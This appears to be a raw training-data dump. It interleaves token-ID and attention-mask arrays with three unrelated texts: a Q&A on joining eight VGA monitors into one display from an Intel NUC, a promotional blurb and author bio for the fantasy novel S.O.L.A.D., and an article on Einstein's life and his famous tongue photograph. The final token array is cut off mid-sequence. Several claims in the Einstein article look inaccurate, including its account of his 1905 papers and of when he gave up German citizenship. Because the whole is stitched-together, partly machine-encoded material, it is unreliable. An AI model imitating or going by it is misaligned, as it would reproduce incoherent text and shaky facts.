1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Q: How can I extend the desktop across 8 VGA monitors so they operate as one large monitor from one PC? I have 8 monitors of the same model. The monitors have a VGA and DVI port. I would like to have them operate integrated as a single large monitor, hooked up to an Intel NUC. I'm not expecting great performance, as I only want to display a simple screensaver (a scrolling banner with company name). I found many VGA splitters, such as from Lindy or whitelabel from Amazon. However, these will push the same image to each of the 8 monitors. Is there a way (I was unable to find one) to merge the 8 monitors into 1, having them act as 1? If not, what would be the best alternative? A requirement is that I can only use passively cooled hardware, so installing a tower PC with multiple graphics cards is not possible, and also too expensive. A: If your graphics cards are Nvidia, they have a software called Surround Vision that turns any amount of monitors into a single one. http://nvidia.custhelp.com/app/answers/detail/a_id/2667 If you have an AMD card, they have built in software called Eyefinity. http://www.amd.com/en-us/innovations/software-technologies/technologies-gaming/eyefinity Both of these can consolidate your displays. If you just have a NUC though, there is almost zero room for options. If is a newer NUC and has thunderbolt 3, you can get an external graphics card and use a matrox or some card that has a lot of display outs, but they are expensive. There are no devices that can allow for one graphics port to be turned into 8 that are not replicated.
[ 1, 660, 29901, 13, 13, 5328, 508, 306, 10985, 278, 14616, 4822, 29871, 29947, 478, 12739, 1601, 17259, 577, 896, 21994, 408, 697, 2919, 11819, 515, 697, 9609, 29973, 13, 13, 29902, 505, 29871, 29947, 1601, 17259, 310, 278, 1021, 1904, 29889, 450, 1601, 17259, 505, 263, 478, 12739, 322, 360, 18118, 2011, 29889, 13, 29902, 723, 763, 304, 505, 963, 21994, 23387, 408, 263, 2323, 2919, 11819, 29892, 12422, 287, 701, 304, 385, 18555, 405, 23129, 29889, 306, 29915, 29885, 451, 16120, 2107, 4180, 29892, 408, 306, 871, 864, 304, 2479, 263, 2560, 11844, 12483, 313, 29874, 23064, 289, 7310, 411, 5001, 1024, 467, 13, 29902, 1476, 1784, 478, 12739, 6219, 2153, 29892, 1316, 408, 515, 17277, 29891, 470, 377, 7454, 1107, 515, 16631, 29889, 2398, 29892, 1438, 674, 5503, 278, 1021, 1967, 304, 1269, 310, 278, 29871, 29947, 1601, 17259, 29889, 13, 3624, 727, 263, 982, 313, 29902, 471, 9368, 304, 1284, 697, 29897, 304, 10366, 278, 29871, 29947, 1601, 17259, 964, 29871, 29896, 29892, 2534, 963, 1044, 408, 29871, 29896, 29973, 13, 3644, 451, 29892, 825, 723, 367, 278, 1900, 8671, 29973, 319, 11809, 338, 393, 306, 508, 871, 671, 1209, 3598, 1302, 29877, 839, 12837, 29892, 577, 15476, 263, 19372, 9609, 411, 2999, 18533, 15889, 338, 451, 1950, 29892, 322, 884, 2086, 19390, 29889, 13, 13, 29909, 29901, 13, 13, 3644, 596, 18533, 15889, 526, 405, 28584, 29892, 896, 505, 263, 7047, 2000, 317, 1038, 618, 478, 2459, 393, 12169, 738, 5253, 310, 1601, 17259, 964, 263, 2323, 697, 29889, 1732, 597, 29876, 28584, 29889, 29883, 504, 8477, 29889, 510, 29914, 932, 29914, 550, 17538, 29914, 16432, 29914, 29874, 29918, 333, 29914, 29906, 29953, 29953, 29955, 13, 3644, 366, 505, 385, 319, 5773, 5881, 29892, 896, 505, 4240, 297, 7047, 2000, 382, 29891, 1389, 13593, 29889, 1732, 597, 1636, 29889, 22490, 29889, 510, 29914, 264, 29899, 375, 29914, 2559, 586, 800, 29914, 20415, 29899, 21695, 11763, 29914, 21695, 11763, 29899, 29887, 11500, 29914, 1032, 1389, 13593, 13, 29933, 720, 310, 1438, 508, 1136, 17211, 403, 596, 14423, 29889, 960, 366, 925, 505, 263, 405, 23129, 2466, 29892, 727, 338, 4359, 5225, 5716, 363, 3987, 29889, 960, 338, 263, 20687, 405, 23129, 322, 756, 266, 5062, 2095, 29873, 29871, 29941, 29892, 366, 508, 679, 385, 7029, 18533, 5881, 322, 671, 263, 1775, 307, 29916, 470, 777, 5881, 393, 756, 263, 3287, 310, 2479, 714, 29879, 29892, 541, 896, 526, 19390, 29889, 1670, 526, 694, 9224, 393, 508, 2758, 363, 697, 18533, 2011, 304, 367, 6077, 964, 29871, 29947, 393, 526, 451, 1634, 9169, 29889, 13, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
What if you were the only person who could save a planet overrun by demons? Would you run and hide or stand and fight as a Soldier of Light? This is the official blog of S.O.L.A.D.™: Soldiers of Light Against Darkness™ The Story What would you do if you were the only person who could save a world overrun by demons? Kevin Edwards and Juanita Grayson have reached a critical point in their lives. Not only has their relationship ended as they prepare to graduate from high school, but they still love each other and have found no clear-cut solution on how to reconcile. But things get worse after they are transported to a world ruled by demons and are told by Wiseman J, leader of the rebellion against the demonic horde, that they have been chosen to save the world. Absolutely sure they are not dreaming and having no way t quickly return home, Kevin and Juanita are each given a ring that transforms them into the super-powered beings Angelo™ and Angeline™: Soldiers of Light Against Darkness™. Angelo and Angeline easily best the demons they encounter on their first mission. But when the powerful entity known as the Demon Master learns of the new heroes’ arrival, he unleashes an army of strong , super-powered demons to kill the heroes. Aided by Wiseman J’s niece Melanie, a kind-hearted and dependable young woman and Wiseman J’s mentee Jeff: Ward of Law, who was Dark Earth’s legendary hero before the S.O.L.A.D.’s arrival, Angelo and Angeline work towards accomplishing their ultimate goal: ending the Demon Master’s evil reign. As the war rages on, the young heroes come face-to-face with their morality, humanity, spirituality and destinies. If Kevin and Juanita want to save the people of Dark Earth and ensure they get back home alive, they will have to embrace the light and fight, while unlocking the secrets of their shocking connection to the Demon Master. What would you do if you were the only person who could save a world overrun by demons? Would you run and hide? Or would you stand and fight as a Soldier of Light Against Darkness? Find out in this exciting and compelling tale of love, war, secrets, revelations, hope, perseverance, purpose and destiny. Add to StumbleUpon Tweet This About The Author Inspired as a child by Superman’s alter ego Clark Kent, a go-getter reporter at The Daily Planet, Tyrone Tony Reed Jr.’s writing career began in his teen years. He was a Teen Panelist for The Commercial Appeal, in Memphis, Tenn., for two years and a reporter for The Teen Appeal newspaper, also in Memphis, for three years. While earning his journalism degree at Franklin College in Franklin, Ind., Tyrone held several positions on the college's newspaper, The Franklin. Tyrone also worked as a crime reporter for four years at The Jackson Sun in Jackson, TN. He is now a freelance writer, who has completed his first novel, S.O.L.A.D.™: Soldiers of Light Against Darkness™, soon to be a best-seller on several lists. It is available on Amazon.com here http://amzn.to/MQJBHC Tyrone is working on the second novel in the S.O.L.A.D.™ series. Tyrone can be reached at ttreed2009@hotmail.com or on Facebook, Twitter, LinkedIn or his blog through the links below.
[ 1, 1724, 565, 366, 892, 278, 871, 2022, 1058, 1033, 4078, 263, 15754, 975, 3389, 491, 1261, 787, 29973, 13, 29956, 483, 366, 1065, 322, 9563, 470, 2317, 322, 8589, 408, 263, 19019, 631, 310, 12790, 29973, 13, 4013, 338, 278, 6221, 12618, 310, 317, 29889, 29949, 29889, 29931, 29889, 29909, 29889, 29928, 29889, 30536, 29901, 19019, 4285, 310, 12790, 11454, 303, 15317, 2264, 30536, 13, 13, 1576, 13740, 13, 13, 5618, 723, 366, 437, 565, 366, 892, 278, 871, 2022, 1058, 1033, 4078, 263, 3186, 975, 3389, 491, 1261, 787, 29973, 13, 13, 9598, 3845, 29174, 322, 8699, 2028, 18956, 1100, 505, 7450, 263, 12187, 13, 3149, 297, 1009, 12080, 29889, 2216, 871, 756, 1009, 9443, 9698, 408, 896, 19012, 304, 13, 5105, 27240, 515, 1880, 3762, 29892, 541, 896, 1603, 5360, 1269, 916, 322, 505, 1476, 694, 13, 8551, 29899, 7582, 1650, 373, 920, 304, 8265, 21873, 29889, 13, 13, 6246, 2712, 679, 15029, 1156, 896, 526, 8608, 287, 304, 263, 3186, 13, 582, 839, 491, 1261, 787, 322, 526, 5429, 491, 15756, 11422, 435, 29892, 11822, 310, 278, 337, 12562, 291, 2750, 278, 13, 2310, 8927, 4029, 311, 29892, 393, 896, 505, 1063, 10434, 304, 4078, 278, 3186, 29889, 13, 13, 4920, 2929, 11579, 1854, 896, 526, 451, 12561, 292, 322, 2534, 694, 982, 260, 13, 24561, 368, 736, 3271, 29892, 19323, 322, 8699, 2028, 526, 1269, 2183, 263, 9228, 393, 4327, 29879, 13, 386, 331, 964, 278, 2428, 29899, 13519, 287, 367, 886, 3218, 7078, 30536, 322, 3218, 5570, 30536, 29901, 19019, 4285, 310, 12790, 13, 14769, 475, 303, 15317, 2264, 30536, 29889, 13, 13, 9928, 7078, 322, 3218, 5570, 5948, 1900, 278, 1261, 787, 896, 11735, 373, 13, 1552, 381, 937, 10655, 29889, 1205, 746, 278, 13988, 7855, 2998, 408, 278, 4432, 265, 9082, 13, 1945, 1983, 310, 278, 716, 13444, 267, 30010, 18517, 29892, 540, 443, 280, 1161, 267, 385, 9987, 310, 4549, 1919, 2428, 29899, 13519, 287, 13, 2310, 787, 304, 12088, 278, 13444, 267, 29889, 13, 13, 29909, 2618, 491, 15756, 11422, 435, 30010, 29879, 4930, 346, 6286, 6067, 29892, 263, 2924, 29899, 23057, 287, 322, 13, 2716, 355, 519, 4123, 6114, 322, 15756, 11422, 435, 30010, 29879, 286, 2016, 29872, 12208, 29901, 21910, 310, 7927, 29892, 1058, 471, 15317, 13, 29923, 28696, 30010, 29879, 15983, 653, 13444, 1434, 278, 317, 29889, 29949, 29889, 29931, 29889, 29909, 29889, 29928, 16412, 29879, 18517, 29892, 3218, 7078, 322, 3218, 5570, 13, 1287, 7113, 12709, 292, 1009, 8494, 6490, 7306, 29901, 17140, 278, 4432, 265, 9082, 30010, 29879, 16126, 13, 276, 647, 29889, 13, 13, 2887, 278, 1370, 1153, 2710, 373, 29892, 278, 4123, 13444, 267, 2041, 3700, 29899, 517, 29899, 2161, 411, 13, 1552, 381, 3036, 2877, 29892, 5199, 537, 29892, 20954, 537, 322, 15422, 583, 29889, 13, 13, 3644, 19323, 322, 8699, 2028, 864, 304, 4078, 278, 2305, 310, 15317, 11563, 13, 392, 9801, 896, 679, 1250, 3271, 18758, 29892, 896, 674, 505, 304, 953, 13842, 278, 3578, 322, 13, 29888, 523, 29892, 1550, 443, 908, 292, 278, 22183, 1372, 310, 1009, 19253, 292, 3957, 304, 278, 4432, 265, 13, 19203, 29889, 13, 13, 5618, 723, 366, 437, 565, 366, 892, 278, 871, 2022, 1058, 1033, 4078, 13, 29874, 3186, 975, 3389, 491, 1261, 787, 29973, 13, 13, 29956, 483, 366, 1065, 322, 9563, 29973, 13, 13, 2816, 723, 366, 2317, 322, 8589, 408, 263, 19019, 631, 310, 12790, 11454, 303, 13, 29928, 935, 2264, 29973, 13, 13, 12542, 714, 297, 445, 5566, 11407, 322, 752, 7807, 17694, 310, 5360, 29892, 1370, 29892, 13, 344, 1037, 1372, 29892, 20474, 800, 29892, 4966, 29892, 639, 344, 369, 749, 29892, 6437, 322, 2731, 4901, 29889, 13, 13, 2528, 304, 624, 15563, 29965, 1112, 13, 13, 29911, 16668, 910, 13, 13, 28173, 450, 13361, 13, 13, 797, 1028, 2859, 408, 263, 2278, 491, 5670, 1171, 30010, 29879, 10551, 321, 1484, 17129, 13272, 29892, 263, 748, 29899, 657, 357, 1634, 9555, 472, 450, 23331, 20540, 29892, 323, 4316, 650, 15293, 830, 287, 13843, 16412, 29879, 5007, 6413, 4689, 297, 670, 734, 264, 2440, 29889, 13, 13, 3868, 471, 263, 1920, 264, 349, 3870, 391, 363, 450, 422, 1050, 1455, 2401, 29872, 284, 29892, 297, 341, 7278, 275, 29892, 323, 2108, 1696, 363, 1023, 2440, 322, 263, 1634, 9555, 363, 450, 1920, 264, 2401, 29872, 284, 19656, 29892, 884, 297, 341, 7278, 275, 29892, 363, 2211, 2440, 29889, 13, 13, 8809, 488, 2326, 1076, 670, 8955, 1608, 7426, 472, 21504, 6346, 297, 21504, 29892, 1894, 1696, 323, 4316, 650, 4934, 3196, 11909, 373, 278, 12755, 29915, 29879, 19656, 29892, 450, 21504, 29889, 13, 13, 29911, 4316, 650, 884, 3796, 408, 263, 17268, 1634, 9555, 363, 3023, 2440, 472, 450, 11886, 8991, 297, 11886, 29892, 323, 29940, 29889, 13, 13, 3868, 338, 1286, 263, 3005, 295, 749, 9227, 29892, 1058, 756, 8676, 670, 937, 9554, 29892, 317, 29889, 29949, 29889, 29931, 29889, 29909, 29889, 29928, 29889, 30536, 29901, 19019, 4285, 310, 12790, 11454, 303, 15317, 2264, 30536, 29892, 4720, 304, 367, 263, 1900, 29899, 29879, 4539, 373, 3196, 8857, 29889, 739, 338, 3625, 373, 16631, 29889, 510, 1244, 1732, 597, 314, 3749, 29889, 517, 29914, 25566, 29674, 19127, 13, 13, 29911, 4316, 650, 338, 1985, 373, 278, 1473, 9554, 297, 278, 317, 29889, 29949, 29889, 29931, 29889, 29909, 29889, 29928, 29889, 30536, 3652, 29889, 13, 13, 29911, 4316, 650, 508, 367, 7450, 472, 260, 2484, 287, 29906, 29900, 29900, 29929, 29992, 8711, 2549, 29889, 510, 470, 373, 13327, 29892, 20147, 29892, 28547, 797, 470, 670, 12618, 1549, 278, 2988, 2400, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
As it turns out, the iconic photo was nearly never published in the first place. It’s the iconic image of Albert Einstein. Sometimes it’s a wide-perspective shot that shows his companions in a car in the background. In other versions, it’s cropped to just show Einstein. Both versions capture the great physicist of the 20th century, white hair akimbo, sticking out his tongue in a moment of lighthearted fun before he heads home after a tiring night. The photographer, Arthur Sasse, needed one last shot of the professor as he left, and what he got became a classic of the century’s photographic record. German Jews In Einstein’s Era Had Albert Einstein been born a decade earlier, the world may not have ever known his name. Born in Germany in 1879, Einstein was part of the first fully free generation of European Jews since the 12th century. Previous generations of Ashkenazi Jews — Jews in Germany of Eastern European descent — had been bottled up inside walled ghettos, so that even the most intelligent and ambitious Jewish kids could never hope to be more than an esteemed rabbi, rather than leaving their confinement and becoming world-famous scientists. Indeed, when the North German Confederation adopted a constitution that granted Jews civil rights in 1867, people took to the streets in protest. For Einstein, born a little more than a decade later, life was different — though it had other challenges. To his parents’ consternation, Einstein was slow to learn to talk. Contrary to popular anecdotes, Einstein was an average to above-average student who not only excelled at math, but planned to teach it when he graduated. Those hopes were dashed, however, when he walked into a string of rejections at every university he applied to. Around 1900, the 21-year-old Einstein renounced his German citizenship and moved to Switzerland, where he supported himself and his wife as a freelance math tutor and “technical expert” at the patent office. During his free time, he kept himself busy by drafting scientific papers that revolutionized physics forever. New Ideas In A New Home In 1905, Einstein authored several papers that utterly changed the way physicists thought about the world. In the first, he theorized that light can only be emitted at discrete wavelengths. This would form the core of quantum mechanics, decades later. In another paper, he explained some of the strange things that electromagnetic force does with bodies in motion, making breakthroughs that are ultimately the reason we now have nuclear power. In yet another paper, “Does the Inertia of a Body Depend upon its Energy-Content?,” he first published the E=mc² equation that is all half of humanity knows about his contributions to science. All of this output – some of which eventually won him the 1921 Nobel Prize – led to his acceptance at prestigious academic institutions until, in 1914, he was admitted to the Prussian Academy of Sciences and given a non-lecture position in Berlin. He worked there in relative obscurity throughout World War I, which seems to have made a committed pacifist out of him. Fame and fortune came in 1919, when British physicists tested one of relativity theory’s predictions (about the deflection of starlight during an eclipse) and indeed found the effect Einstein had predicted. Almost overnight, English-speaking countries hailed Einstein as the next Isaac Newton, invited both Einstein and his wife on a series of lecture tours in Britain and America, where they were received as honored guests everywhere they went. The good times came to a halt in 1932, when Germany held an election that left the Nazis as the largest single party in the Reichstag. In January 1933, President Hindenburg invited Chancellor Hitler to form a government. In March, Einstein resigned all of his German posts and asked for asylum in the United States. The next day’s headline in the Berliner Tageblatt read: “Good News From Einstein: He Isn’t Coming Back!” The 54-year-old Nobel Laureate would never set foot in his native Germany again.
[ 1, 1094, 372, 12169, 714, 29892, 278, 9849, 293, 15373, 471, 8886, 2360, 6369, 297, 278, 937, 2058, 29889, 13, 13, 3112, 30010, 29879, 278, 9849, 293, 1967, 310, 10537, 2694, 5465, 29889, 13, 13, 29903, 14618, 372, 30010, 29879, 263, 9377, 29899, 6774, 12645, 10322, 393, 3697, 670, 8119, 1080, 297, 263, 1559, 297, 278, 3239, 29889, 512, 916, 6910, 29892, 372, 30010, 29879, 8182, 2986, 304, 925, 1510, 2694, 5465, 29889, 9134, 6910, 10446, 278, 2107, 4824, 293, 391, 310, 278, 29871, 29906, 29900, 386, 6462, 29892, 4796, 11315, 11208, 326, 833, 29892, 12070, 292, 714, 670, 26820, 297, 263, 3256, 310, 3578, 23057, 287, 2090, 1434, 540, 15883, 3271, 1156, 263, 260, 8491, 4646, 29889, 13, 13, 1576, 17739, 261, 29892, 11498, 317, 5793, 29892, 4312, 697, 1833, 10322, 310, 278, 12251, 408, 540, 2175, 29892, 322, 825, 540, 2355, 3897, 263, 22037, 310, 278, 6462, 30010, 29879, 6731, 12122, 2407, 29889, 13, 13, 29954, 3504, 22057, 512, 2694, 5465, 30010, 29879, 21018, 13, 13, 29950, 328, 10537, 2694, 5465, 1063, 6345, 263, 316, 6332, 8859, 29892, 278, 3186, 1122, 451, 505, 3926, 2998, 670, 1024, 29889, 19298, 297, 9556, 297, 29871, 29896, 29947, 29955, 29929, 29892, 2694, 5465, 471, 760, 310, 278, 937, 8072, 3889, 12623, 310, 7824, 22057, 1951, 278, 29871, 29896, 29906, 386, 6462, 29889, 13, 13, 6572, 2366, 1176, 800, 310, 12835, 1717, 18861, 22057, 813, 22057, 297, 9556, 310, 16162, 7824, 26815, 813, 750, 1063, 18046, 839, 701, 2768, 281, 4212, 24170, 1803, 359, 29892, 577, 393, 1584, 278, 1556, 13052, 296, 322, 626, 2966, 2738, 16728, 413, 4841, 1033, 2360, 4966, 304, 367, 901, 1135, 385, 4404, 22580, 1153, 14663, 29892, 3265, 1135, 10124, 1009, 1970, 262, 882, 322, 14171, 3186, 29899, 29888, 314, 681, 9638, 2879, 29889, 13, 13, 2568, 12613, 29892, 746, 278, 4644, 5332, 24606, 362, 16356, 263, 16772, 393, 16896, 22057, 7631, 10462, 297, 29871, 29896, 29947, 29953, 29955, 29892, 2305, 3614, 304, 278, 19756, 297, 10021, 29889, 13, 13, 2831, 2694, 5465, 29892, 6345, 263, 2217, 901, 1135, 263, 316, 6332, 2678, 29892, 2834, 471, 1422, 813, 2466, 372, 750, 916, 18066, 267, 29889, 13, 13, 1762, 670, 11825, 30010, 1040, 824, 362, 29892, 2694, 5465, 471, 5232, 304, 5110, 304, 5193, 29889, 1281, 509, 653, 304, 5972, 385, 687, 29881, 4769, 29892, 2694, 5465, 471, 385, 6588, 304, 2038, 29899, 12483, 482, 8368, 1058, 451, 871, 10616, 839, 472, 5844, 29892, 541, 20458, 304, 6860, 372, 746, 540, 23588, 29889, 13, 13, 1349, 852, 26926, 892, 27526, 29892, 3138, 29892, 746, 540, 17096, 964, 263, 1347, 310, 337, 24247, 472, 1432, 16372, 540, 7436, 304, 29889, 826, 618, 29871, 29896, 29929, 29900, 29900, 29892, 278, 29871, 29906, 29896, 29899, 6360, 29899, 1025, 2694, 5465, 4325, 20979, 670, 5332, 18363, 4034, 322, 6153, 304, 28806, 29892, 988, 540, 6969, 3654, 322, 670, 6532, 408, 263, 3005, 295, 749, 5844, 260, 3406, 322, 1346, 21695, 936, 17924, 30024, 472, 278, 2373, 296, 8034, 29889, 13, 13, 29928, 3864, 670, 3889, 931, 29892, 540, 8126, 3654, 19587, 491, 18195, 292, 16021, 15055, 393, 19479, 1891, 17558, 22296, 29889, 13, 13, 4373, 13001, 294, 512, 319, 1570, 8778, 13, 13, 797, 29871, 29896, 29929, 29900, 29945, 29892, 2694, 5465, 4148, 287, 3196, 15055, 393, 14401, 368, 3939, 278, 982, 4824, 293, 2879, 2714, 1048, 278, 3186, 29889, 13, 13, 797, 278, 937, 29892, 540, 278, 272, 1891, 393, 3578, 508, 871, 367, 953, 4430, 472, 19554, 281, 6447, 1477, 29879, 29889, 910, 723, 883, 278, 7136, 310, 12101, 7208, 1199, 29892, 1602, 3076, 2678, 29889, 512, 1790, 5650, 29892, 540, 10824, 777, 310, 278, 8515, 2712, 393, 3546, 26097, 293, 4889, 947, 411, 17873, 297, 10884, 29892, 3907, 2867, 20678, 29879, 393, 526, 18973, 278, 2769, 591, 1286, 505, 20346, 3081, 29889, 512, 3447, 1790, 5650, 29892, 1346, 25125, 278, 512, 814, 423, 310, 263, 24928, 10034, 355, 2501, 967, 24836, 29899, 3916, 29973, 3995, 540, 937, 6369, 278, 382, 29922, 14047, 30088, 6306, 393, 338, 599, 4203, 310, 5199, 537, 9906, 1048, 670, 20706, 304, 10466, 29889, 13, 13, 3596, 310, 445, 1962, 785, 777, 310, 607, 10201, 2113, 1075, 278, 29871, 29896, 29929, 29906, 29896, 27813, 20604, 785, 5331, 304, 670, 3544, 749, 472, 544, 5286, 2738, 21567, 21561, 2745, 29892, 297, 29871, 29896, 29929, 29896, 29946, 29892, 540, 471, 20186, 304, 278, 1588, 1558, 713, 10355, 310, 17253, 322, 2183, 263, 1661, 29899, 781, 545, 2602, 297, 5115, 29889, 940, 3796, 727, 297, 6198, 19726, 7710, 10106, 2787, 3362, 306, 29892, 607, 2444, 304, 505, 1754, 263, 19355, 22906, 361, 391, 714, 310, 1075, 29889, 13, 13, 29943, 420, 322, 19717, 2996, 297, 29871, 29896, 29929, 29896, 29929, 29892, 746, 4908, 4824, 293, 2879, 9528, 697, 310, 14215, 537, 6368, 30010, 29879, 27303, 313, 12717, 278, 822, 1464, 310, 5810, 4366, 2645, 385, 16517, 29897, 322, 6200, 1476, 278, 2779, 2694, 5465, 750, 25383, 29889, 838, 3242, 975, 11147, 29892, 4223, 